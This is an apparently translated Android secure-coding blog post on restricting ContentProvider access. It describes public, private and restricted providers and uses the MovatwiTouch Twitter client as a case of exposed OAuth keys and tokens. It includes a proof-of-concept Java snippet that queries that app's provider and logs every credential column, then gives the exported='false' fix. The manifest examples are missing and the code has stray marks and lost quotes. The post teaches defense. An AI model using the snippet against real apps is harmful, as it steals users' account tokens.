[Security programming in Android] emerge #01-restrict the accessibility of sensitive ContentProvider of apps

 

The ContentProvider class provides a mechanism for managing and sharing data with other apps. When sharing provider data with other apps, you must implement access control carefully to prevent unauthorized access to sensitive data.

There are three methods to restrict access to ContentProvider:

Public

Private

Restricted access

 

[Public]

In AndroidManifest. when the android: exported attribute is declared in the xml file, ContentProvider can be made public to other apps. For versions earlier than Android API Level 16, ContentProvider is public by default, unless android is explicitly declared: exported = "false", for example:

 

If ContentProvider is set to Public, the data stored in ContentProvider can be accessed by other apps. Therefore, the design must ensure that only non-confidential information is disclosed.

 

[Private]

Declare the android: exported attribute in the AndroidManifest. xml file. You can set ContentProvider to Private. In Android API Level 17 and later versions, ContentProvider is Private by default and does not need to be explicitly declared. For example:

If ContentProvider does not need to share data with other apps, declare android: exported = "false" in the manifest file. Note that in API Level 8 and earlier versions, even if you explicitly declare android: exported = "false", the corresponding ContentProvider can still be accessed by other apps.

 

[Restricted Access]

To be continued

 

[Example code that does not meet security requirements]

MovatwiTouch is a Twitter client that uses ContentProvider to manage the key, secret, and access token of Twitter users. However, this ContentProvider is Public, this allows other apps installed on the same mobile phone to obtain the sensitive information.

The Provider declaration in the AndroidManifest. xml file below does not specify the android: exported attribute. Therefore, before API Level 16, this ContentProvider is made public.

 

[Concept verification]

The following code demonstrates how the Public ContentProvider vulnerability is exploited.

// check whether movatwi is installed.try {  ApplicationInfo info = getPackageManager().getApplicationInfo(jp.co.vulnerable, 0);[cjl5]} catch (NameNotFoundException e) {  Log.w(TAG, the app is not installed.);  return;}// extract account data through content providerUri uri = Uri.parse(content://jp.co.vulnerable.accountprovider);Cursor cur = getContentResolver().query(uri, null, null, null, null);[cjl6]StringBuilder sb = new StringBuilder();if (cur != null) {  int ri = 0;  while (cur.moveToNext()) {    ++ri;    Log.i(TAG, String.format(row[%d]:, ri));    sb.setLength(0);    for (int i = 0; i < cur.getColumnCount(); ++i) {      String column = cur.getColumnName(i);      String value = cur.getString(i);      if (value != null) {        value = value.replaceAll([], );      }      Log.i(TAG, String.format(%s:%s, column, value));    }  }} else {  Log.i(TAG, Can't get the app information.);}

 

[Solution]

In the AndroidManifest. xml file, explicitly declare ContentProvider

android:exported=“false”
 

-- Welcome to reprint, please indicate the source of http://blog.csdn.net/asce1885, do not use for commercial purposes without my consent, thank you --